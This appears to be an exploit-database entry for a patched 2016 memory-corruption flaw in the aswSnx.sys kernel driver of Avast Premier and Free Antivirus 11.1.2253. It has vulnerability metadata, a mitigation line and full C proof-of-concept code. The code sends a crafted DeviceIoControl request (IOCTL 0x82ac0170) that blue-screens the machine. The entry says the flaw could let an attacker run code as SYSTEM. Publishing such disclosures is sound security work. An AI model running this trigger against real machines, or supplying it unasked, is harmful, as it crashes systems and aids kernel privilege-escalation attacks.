BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)

vendor:

Avast Premier Antivirus

by:

bee13oy

7,8

CVSS

HIGH

Memory Corruption Vulnerability

119

CWE

Product Name: Avast Premier Antivirus

Affected Version From: 11.1.2253

Affected Version To: 11.1.2253

Patch Exists: YES

Related CWE: N/A

CPE: a:avast_software:avast_premier_antivirus:11.1.2253

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x86 / Windows 10 x86

2016

BSoD on Windows 7 x86 / Windows 10 x86 + Avast Premier / Avast Free Antivirus (11.1.2253)

There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the context of SYSTEM.

Mitigation:

Update to the latest version of Avast Premier / Avast Free Antivirus.

Source

Exploit-DB raw data:

/**
* Author: bee13oy
* BSoD on Windows 7 x86 / Windows 10 x86  + Avast Premier / Avast Free Antivirus (11.1.2253)
* Source: https://github.com/bee13oy/AV_Kernel_Vulns/tree/master/Avast/aswSnx_BSoD2(ZDI-16-681)
*
* There is a Memory Corruption Vulnerability in aswSnx.sys when DeviceIoControl API is called with ioctl 
* number 0x82ac0170, and An attacker may leverage this vulnerability to execute arbitrary code in the 
* context of SYSTEM.
**/

#include <Windows.h>

void BSoD(const char* szDeviceName)
{
	HANDLE hDevice = CreateFileA(szDeviceName,
		GENERIC_READ, 
		0, 
		NULL, 
		OPEN_EXISTING, 
		0, 
		NULL);

	if (hDevice != INVALID_HANDLE_VALUE)
	{
		DWORD nbBytes = 0;
		CHAR bufInput[0x8+1] = "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"; 
		CHAR bufOuput[0x8+1] = ""; 
		DeviceIoControl(hDevice, 
			0x82ac0170, 
			bufInput, 
			0x00000008, 
			bufOuput, 
			0x00000008, 
			&nbBytes, 
			NULL
			); 
	}
}

int _tmain(int argc, _TCHAR* argv[])
{
	BSoD("\\\\.\\aswSnx");

	return 0;
}